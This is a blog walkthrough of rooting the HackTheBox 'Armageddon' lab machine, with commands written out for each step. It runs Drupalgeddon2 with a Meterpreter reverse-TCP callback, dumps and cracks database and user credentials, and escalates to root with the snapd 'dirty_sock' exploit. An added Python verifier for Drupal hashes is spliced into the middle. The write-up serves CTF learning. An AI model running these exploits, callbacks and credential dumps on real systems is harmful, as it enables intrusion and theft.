Armageddon HackTheBox WalkThrough

This is the Armageddon HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Armageddon HackTheBox machine. Before starting, let us learn something about this machine. It is a Linux box with the IP address 10.10.10.233, and its maker has assigned it the difficulty rating easy.

First of all, connect your PC to the HackTheBox VPN and confirm your connectivity to the Armageddon machine by pinging its IP 10.10.10.233. If all goes well, start hacking. As usual, I began by scanning the machine. Scanning gives us an idea of how to proceed further: it helps with banner grabbing of the services running on different ports, and sometimes it helps with vulnerability scanning too. I used nmap for this task and the result is given below:

Scanning

$ sudo nmap -sC -sV -sT -oA nmap/Armageddon 10.10.10.233

Nmap found ports 22 and 80 open. OpenSSH 7.4 is running on port 22 and an Apache web server is running on port 80. The nmap script http-generator also revealed that the website hosted on this web server was created with the Drupal 7 CMS. Drupal is an open source CMS that lets us create attractive websites, much like WordPress. Going to the URL http://10.10.10.233 showed the Drupal login page.

I wanted to find the exact version of this CMS so that I could search for available exploits. The URL http://10.10.10.233/robots.txt listed the file /CHANGELOG.txt. A CHANGELOG.txt file usually records changes such as bug fixes and new features added to the application. Going to http://10.10.10.233/CHANGELOG.txt showed that the installed version of Drupal is 7.56, which was released on 21st of June 2017.

Tip: Whenever you find that an open source CMS is in use, simply go to its GitHub repository, check its directory structure, and then look for the same files on the target website. Don't directory bruteforce the target site, because in an open source CMS the file layout is already publicly available.

Let us search for available exploits using $ searchsploit.

Searching for Drupal Exploits

$ searchsploit drupal 7.56

Searchsploit found a good number of exploits. My first focus was on Metasploit because it makes our work a lot easier. When I searched for Drupal exploits in Metasploit, it found many. Drupalgeddon was my focus because its suffix matches the machine name. After some trial and error the exploit exploit/unix/webapp/drupal_drupalgeddon2 worked and gave me a shell. So let us get a user shell.

Getting User Shell

msf6 > search drupal

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.10

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

meterpreter > sysinfo

We have successfully got a user shell. Let us upgrade it to a fully interactive Linux shell so that we can proceed to the higher level tasks.

Upgrading Shell

meterpreter > shell

~/bin/bash -i

bash-4.2$ export TERM=xterm

Note: $ python3 -c 'import pty; pty.spawn("/bin/bash")' won’t work.

After some initial enumeration I found database login credentials inside the file settings.php.

$ cat /var/www/html/sites/default/settings.php

The credentials are:

database : drupal

username : drupaluser

password : CQHEy@9M*m23gBVj

host : localhost

port : 3306

driver : mysql

My next step was to find out whether a database server is running locally, so that I could use these credentials to dump other users' login credentials.

$ netstat -punta

The netstat command showed that port 3306 is listening locally. So let us log in to the MySQL server and see what is present there.

Logging into MySQL & Dumping User Creds

Since we don't have a fully interactive Linux shell, we can't spawn the MySQL prompt. We have to run each SQL command in one line with -e. For more info on using MySQL commands in one line check this article.

$ mysql -u'drupaluser' -p'CQHEy@9M*m23gBVj' -e 'show databases;'

$ mysql -u'drupaluser' -p'CQHEy@9M*m23gBVj' -D drupal -e 'show tables;'

$ mysql -u'drupaluser' -p'CQHEy@9M*m23gBVj' -D drupal -e 'select name,pass from users;'

———–Snip————

We got the hash of user brucetherealadmin, which is $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt. Let us identify the hash so that we can crack it with $ hashcat (an offline password cracker).

Identifying Hash

hash-identifier reported the algorithm as Drupal 7 (the $S$ prefix). Let us crack it.

Cracking Hash

$ hashcat -a 0 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' /usr/share/wordlists/rockyou.txt

$ hashcat -a 0 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' --show

—————–Snip—————–

Hashcat found the password of brucetherealadmin to be booboo. Let us check whether the user brucetherealadmin exists on the box.
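To show what hash-identifier and hashcat mode 7900 are actually dealing with, here is an added Python example (not code from the original walkthrough) that parses the Drupal 7 $S$ format, extracts the iteration cost and salt, and re-derives the hash to verify the recovered password; the function names are my own, and BRUCE_HASH is the hash dumped above.

```python
import hashlib
import hmac
# Drupal 7 phpass-style alphabet; the character after "$S$" indexes into it
# and gives log2 of the SHA-512 iteration count ('D' -> 15 -> 32768 rounds).
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
DRUPAL_HASH_LENGTH = 55      # Drupal truncates the stored string to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30   # cost bounds Drupal 7 accepts
# The hash dumped from the users table in the walkthrough above.
BRUCE_HASH = '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt'

def phpass_b64(data: bytes) -> str:
    """phpass base64 (little-endian, custom alphabet) as Drupal encodes it."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)

def parse_drupal7_hash(stored: str):
    """Return (iteration_log2, salt) from a "$S$" hash; reject malformed input."""
    if not stored.startswith('$S$') or len(stored) != DRUPAL_HASH_LENGTH:
        raise ValueError('not a Drupal 7 SHA-512 hash')
    count_log2 = ITOA64.index(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError('iteration cost out of range')
    return count_log2, stored[4:12]

def verify_drupal7_password(password: str, stored: str) -> bool:
    """Recompute the stretched SHA-512 chain and compare in constant time."""
    count_log2, salt = parse_drupal7_hash(stored)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    candidate = (stored[:12] + phpass_b64(digest))[:DRUPAL_HASH_LENGTH]
    return hmac.compare_digest(candidate, stored)
```

The 2^15 rounds per guess are what make each hashcat candidate expensive; the cost character is the knob a Drupal administrator can raise to slow offline cracking further.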

$ cat /etc/passwd | grep /bash

It exists and it also has a bash shell. Let us SSH in using $ ssh (the OpenSSH remote login client).

SSH into user Brucetherealadmin

$ ssh brucetherealadmin@10.10.10.233

~booboo

We are now logged in as user brucetherealadmin. Let us capture user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate privileges to root we first have to find a privilege escalation vector.

Finding PrivEsc Vector

$ sudo -l

The sudo -l command revealed that user brucetherealadmin can run (root) NOPASSWD: /usr/bin/snap install * on armageddon as root. In other words, user brucetherealadmin can install any snap package on armageddon without a password. You can think of a snap package like a docker image: snap packages are self-contained, ship with their own dependencies, and run in a sandboxed environment across different Linux distributions. For more info check this video on YouTube.

The snap version command revealed the installed version of snap and snapd to be 2.47.1-1.el7.

After some googling I found a local privilege escalation exploit for snapd 2.47. For more details on how this exploit works and on the underlying vulnerability, check this link. When I tried this exploit I got a root shell easily. So our PrivEsc vector here is Privilege Escalation by Exploiting a Known Vulnerability in Software, and the software is snapd.

To get a root shell do the following.

Getting Root Shell

$ cd /dev/shm/

$ python -c 'print "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" + "A" * 4256 + "=="' | base64 -d > exploit.snap

$ ls

$ sudo /usr/bin/snap install --devmode exploit.snap

$ su dirty_sock

~dirty_sock

$ sudo -i

# whoami && id

We are root now. Let us capture root flag.

Capture Root Flag

$ cat root.txt

This was how I rooted the Armageddon HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. For any query or doubt about the walkthrough feel free to write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/